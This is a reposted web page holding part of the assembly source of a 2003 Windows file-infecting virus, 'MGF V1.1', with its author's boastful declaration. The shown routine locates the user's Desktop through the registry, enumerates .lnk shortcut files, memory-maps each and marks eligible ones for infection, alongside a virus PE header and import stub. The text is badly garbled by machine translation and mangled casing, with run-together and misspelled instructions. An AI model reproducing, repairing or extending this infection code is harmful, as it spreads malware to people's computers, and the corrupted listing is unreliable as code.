DB' WnetcancelConnectiona ', 0SzwnetCloseenum DB' WnetCloseenum ', 0SzwnetenumResourceA DB' WneetenumResourceA '

, 0szWNetOpenEnumA db 'WNetOpenEnumA', 0_EditLnkFile proc; infection desktop shortcut subroutine local @hFilelocal @hFileMaplocal @lpFileMaplocal @hFindFilelocal @dwFileSizelocal @dwBufferSizelocal @lpBuffer [80h]: bytelocal @ stWin32FindData: WIN32_FIND_DATApushad

Lea Eax, @ hfilepush eaxpush 1push 0le eax, szregkeydesktop [ebx] push eaxpush 80000001hcall dwregopenkeyex [ebx] .IF! EAX

Mov @ dwbuffersize, 80hle Eax, @ dwbuffersizepush eaxlea eax, @ lpbufferpush eaxpush 0 push 0le eax, szdesktopvalue [EBX] Push Eaxpush @HfileCall DwregQueryValueex [EBX]

Push @HfileCall dwregClosekey [EBX]

Dec @dwbuffersizelea edi, @ lpbufferadd edi, @ dwbuffersize.if byte PTR [EDI-1]! = '/' MOV Al, '/' Stosbinc @ dwbuffersize.endifmov Eax, 'NL. *' Stosdmov Eax, 'K'StosD

lea eax, @ stWin32FindDatapush eaxlea eax, @ lpBufferpush eaxcall dwFindFirstFile [ebx]; to find the first lnk file; invoke FindFirstFile, addr @ lpBuffer, addr @ stWin32FindData.if eax = INVALID_HANDLE_VALUEmov @ hFindFile, eax.repeat!

MOV EAX, DWORD PTR [@ stwin32finddata 20h] MOV @ dwfilesize, EAX

Mov ECX, @ dwbuffersizelea EDI, @ stwin32finddata 2chsub Edi, Ecxlea ESI, @ lpbufferpush EdiRep MovsBPOP EDI

Push 0push 80hpush 3push 0push 1push 80000000hpush edicall dwcreatefilea [EBX]; Invoke Createfile, EDI, 80000000H, 1, 0, 3, 80H, 0.IF EAX! = 0Ffffffffhmov @ Hfile, EAX

Push 0push 0push 0push 2push 0push Eaxcall dwcreatefilemapping [EBX]; Invoke CreateFilemapping, Eax, 0, 2, 0, 0.if Eaxmov @ HfileMap, EAX

Push 0push 0push 0push 4push Eaxcall dwmapviewoffile [EBX]; Invoke MapViewoffile, Eax, 4,0,0,0.if Eaxmov @ lpfilemap, EAX

Lea ESI, [EAX 65H] MOV EDI, ESIV ECX, @ dwfilesizesub ECX, 66H @@: incovush ESIPUSH EDIPUSH ECXMOV ECX, 3REPZ CMPSB; Copy * Path in the exe file in the * .lnk file pop ECXPOP EDIPOP EsiloPnz @B. ? if ZERO && byte ptr [edi 3] mov esi, edisub edi, @ lpFileMapmov ecx, @ dwFileSizesub ecx, edilea edi, @ stWin32FindDatapush edi @@: lodsbstosbor al, alloopnz @bpop edimov eax, [edi 2] and eax 0DFDFDFDFH.IF EAX == 'niw /' xor edi, edi.else.if! Dwversion [ebx] && eax == 'ORP /' XOR EDI, EDI.Endif.Endif

.ELSEXOR EDI, EDI.ENDIF

Push @lpfilemapcall dwunmapViewoffile [EBX]; Invoke UnmapViewoffile, @ lpfilemap.endif

Push @HfilemapCall dwclosehandle [EBX]; Invoke CloseHandle, @ hfilemap.endif

Push @HfileCall DWCloseHandle [EBX]; Invoke CloseHandle, @ hfile.endif

. IF Edipush 7Push Edicall_Editfile; eligible, infected. Nendif

lea eax, @ stWin32FindDatapush eaxpush @hFindFilecall dwFindNextFile [ebx]; to continue the search lnk files; invoke FindNextFile, @ hFindFile, addr @ stWin32FindData.until eax == 0push @hFindFilecall dwFindClose [ebx]; invoke FindClose, @ hFindFile.endif

.endif

POPADRET_EDITLNKFILE ENDPSZREGKEYDESKTOP DB 'Software / Microsoft / Windows / CurrentVersion / Explorer / Shell Folders', 0SzdesktopValue DB 'Desktop', 0

SzmessageTit DB 'Mo Guofeng's Declaration', 0SzMessageText DB 'This makers come to the dissemination technology. I have no destruction, you don't have to worry! ', 13, 10db' 我 我 比. Gates: Your fools, despise my vulnerability report, you should play their PP! ', 0

Szver DB 'Name: MGF V1.1', 0Address db '(c) nn.cn (p) 2003-10-08', 0EMAIL DB 'WOHOO2002 @ Hotmail.com', 0

FileHead DB 120H DUP (255); virus PE header, use of viruses, need to manually fill, only reserve space

ImportDirItem:; import table, it is not 2000 / XP / 2003 perform load rejection, to be dd offset FirstThunk0-400000hdd 0dd 0dd offset szKernel32-400000hdd offset FirstThunk1-400000hdd 5 dup (0) FirstThunk0: dd offset szFunctionName-400000hdd 0

Firstthunk1: DD Offset SZFUNCTIONNAME-400000HDD 0

SZFunctionName: DW 75HDB 'EXITPROCESS', 0, 0, 0

Virusend: End VirusStart

Please credit the original address when reposting: https://www.9cbs.com/read-7572.html
